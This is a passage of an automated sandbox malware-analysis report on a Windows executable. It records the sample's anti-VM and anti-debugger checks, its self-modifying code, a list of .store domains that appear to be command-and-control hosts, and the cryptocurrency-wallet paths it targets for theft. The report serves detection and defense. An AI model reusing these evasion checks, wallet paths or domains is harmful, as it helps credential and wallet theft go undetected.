              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60825 second address: 4E60833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60833 second address: 4E60839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60839 second address: 4E6083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6083D second address: 4E60899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9284AFDC8Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F9284AFDC91h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F9284AFDC8Eh 0x00000020 jmp 00007F9284AFDC95h 0x00000025 popfd 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60899 second address: 4E608D9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F92851B8950h 0x00000008 and esi, 125EBA98h 0x0000000e jmp 00007F92851B894Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F92851B8955h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E608D9 second address: 4E608FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 176499C2h 0x00000008 mov si, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9284AFDC91h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6092A second address: 4E60013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov esi, eax 0x00000009 pushad 0x0000000a mov di, si 0x0000000d mov si, 00DFh 0x00000011 popad 0x00000012 test esi, esi 0x00000014 jmp 00007F92851B8952h 0x00000019 je 00007F92F6CB664Bh 0x0000001f xor eax, eax 0x00000021 jmp 00007F928519207Ah 0x00000026 pop esi 0x00000027 pop edi 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d nop 0x0000002e cmp eax, 00000000h 0x00000031 setne cl 0x00000034 xor ebx, ebx 0x00000036 test cl, 00000001h 0x00000039 jne 00007F92851B8947h 0x0000003b jmp 00007F92851B8ABBh 0x00000040 call 00007F9289941BE5h 0x00000045 mov edi, edi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F92851B894Ah 0x0000004f movzx eax, di 0x00000052 popad 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60013 second address: 4E6003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9284AFDC90h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx esi, di 0x00000016 mov ch, bh 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6003E second address: 4E60044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60044 second address: 4E60067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bl, ch 0x0000000f movsx edi, si 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60067 second address: 4E6006D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6006D second address: 4E6007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9284AFDC8Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6007C second address: 4E600FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F92851B894Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F92851B8951h 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b jmp 00007F92851B8957h 0x00000020 popad 0x00000021 xchg eax, ecx 0x00000022 jmp 00007F92851B8956h 0x00000027 mov dword ptr [ebp-04h], 55534552h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600FC second address: 4E60100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60100 second address: 4E60106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60106 second address: 4E60115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9284AFDC8Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60C83 second address: 4E60C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60C87 second address: 4E60C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60C8D second address: 4E60CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8952h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F92851B894Eh 0x00000011 adc ah, FFFFFF88h 0x00000014 jmp 00007F92851B894Bh 0x00000019 popfd 0x0000001a jmp 00007F92851B8958h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F92851B894Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60CED second address: 4E60DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9284AFDC91h 0x00000009 sub eax, 4CC10006h 0x0000000f jmp 00007F9284AFDC91h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F9284AFDC90h 0x0000001b xor ch, FFFFFFA8h 0x0000001e jmp 00007F9284AFDC8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 call 00007F9284AFDC94h 0x0000002e mov bx, ax 0x00000031 pop ecx 0x00000032 jmp 00007F9284AFDC97h 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a pushad 0x0000003b mov bh, al 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F9284AFDC97h 0x00000044 sub ch, FFFFFFAEh 0x00000047 jmp 00007F9284AFDC99h 0x0000004c popfd 0x0000004d pushfd 0x0000004e jmp 00007F9284AFDC90h 0x00000053 and ecx, 70C94828h 0x00000059 jmp 00007F9284AFDC8Bh 0x0000005e popfd 0x0000005f popad 0x00000060 popad 0x00000061 cmp dword ptr [769B459Ch], 05h 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b push ebx 0x0000006c pop ecx 0x0000006d push edi 0x0000006e pop esi 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60DDE second address: 4E60DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60DE4 second address: 4E60DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60DE8 second address: 4E60DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60E46 second address: 4E60E4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60E4E second address: 4E60EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 6F57E8F6h 0x0000000c jmp 00007F92851B8954h 0x00000011 xor dword ptr [esp], 19CD74DEh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F92851B894Eh 0x0000001f adc eax, 075F54D8h 0x00000025 jmp 00007F92851B894Bh 0x0000002a popfd 0x0000002b mov ah, AFh 0x0000002d popad 0x0000002e call 00007F92F6CAD61Eh 0x00000033 push 76952B70h 0x00000038 push dword ptr fs:[00000000h] 0x0000003f mov eax, dword ptr [esp+10h] 0x00000043 mov dword ptr [esp+10h], ebp 0x00000047 lea ebp, dword ptr [esp+10h] 0x0000004b sub esp, eax 0x0000004d push ebx 0x0000004e push esi 0x0000004f push edi 0x00000050 mov eax, dword ptr [769B4538h] 0x00000055 xor dword ptr [ebp-04h], eax 0x00000058 xor eax, ebp 0x0000005a push eax 0x0000005b mov dword ptr [ebp-18h], esp 0x0000005e push dword ptr [ebp-08h] 0x00000061 mov eax, dword ptr [ebp-04h] 0x00000064 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000006b mov dword ptr [ebp-08h], eax 0x0000006e lea eax, dword ptr [ebp-10h] 0x00000071 mov dword ptr fs:[00000000h], eax 0x00000077 ret 0x00000078 pushad 0x00000079 call 00007F92851B894Dh 0x0000007e mov bx, cx 0x00000081 pop esi 0x00000082 popad 0x00000083 mov esi, 00000000h 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007F92851B894Fh 0x0000008f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60EC8 second address: 4E60ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60ECE second address: 4E60ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60ED2 second address: 4E60ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60ED6 second address: 4E60EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-1Ch], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ah, 03h 0x00000010 push ebx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60EE9 second address: 4E60EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9284AFDC8Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60EFA second address: 4E60EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60F10 second address: 4E60F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E60F14 second address: 4E60F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 call 00007F92851B8951h 0x0000000a pop eax 0x0000000b pop edi 0x0000000c popad 0x0000000d test al, al 0x0000000f jmp 00007F92851B894Ch 0x00000014 je 00007F92F6C9C390h 0x0000001a pushad 0x0000001b mov ax, 505Dh 0x0000001f jmp 00007F92851B894Ah 0x00000024 popad 0x00000025 cmp dword ptr [ebp+08h], 00002000h 0x0000002c pushad 0x0000002d call 00007F92851B894Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E806D8 second address: 4E806F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9284AFDC92h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E806F7 second address: 4E8079D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d pushfd 0x0000000e jmp 00007F92851B8950h 0x00000013 adc ecx, 11F9D088h 0x00000019 jmp 00007F92851B894Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov bx, si 0x00000026 mov si, 70F7h 0x0000002a popad 0x0000002b xchg eax, esi 0x0000002c jmp 00007F92851B894Ah 0x00000031 push eax 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F92851B8951h 0x00000039 add cx, 2656h 0x0000003e jmp 00007F92851B8951h 0x00000043 popfd 0x00000044 mov ecx, 58A103C7h 0x00000049 popad 0x0000004a xchg eax, esi 0x0000004b jmp 00007F92851B894Ah 0x00000050 mov esi, dword ptr [ebp+0Ch] 0x00000053 pushad 0x00000054 jmp 00007F92851B894Eh 0x00000059 movzx ecx, di 0x0000005c popad 0x0000005d test esi, esi 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E8079D second address: 4E807A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E807A1 second address: 4E807B7 instructions: 0x00000000 rdtsc 0x00000002 mov bl, 22h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, si 0x00000009 popad 0x0000000a je 00007F92F6C86552h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E807B7 second address: 4E807BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E807BB second address: 4E807BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E807BF second address: 4E807C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E80872 second address: 4E80878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E80878 second address: 4E8087C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6FEF8E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6FEE89 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 89D8C7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6FC14E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 929466 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe TID: 3192 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5576 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000002.2293233357.0000000000880000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2212081244.000000000593A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2293233357.0000000000880000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: presticitpo.store
Source: file.exe, 00000000.00000002.2293477520.00000000008C9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: .*WProgram Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: file.exe, 00000000.00000002.2294200437.0000000000F11000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC^
Source: file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s/ElectronCash-
Source: file.exe, 00000000.00000003.2211982520.00000000058E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Edge/Default/Extensions/Jaxx LibertyP-X-1099659-1-
Source: file.exe, 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet8
Source: file.exe | String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
